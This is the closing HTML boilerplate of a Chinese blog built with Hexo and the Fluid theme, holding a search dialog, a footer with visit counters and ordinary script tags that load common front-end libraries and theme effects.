

  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> <p>本 blog 由 dkdun 支持</p> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>
 
  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/DynamicLine.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-MML-AM_CHTML"></script>
</body>
</html>

<!--浏览器搞笑标题-->
<script type="text/javascript" src="\js\FunnyTitle.js"></script>
<!--鼠标点击礼花特效-->
<script async src="/js/fireworks.js"></script>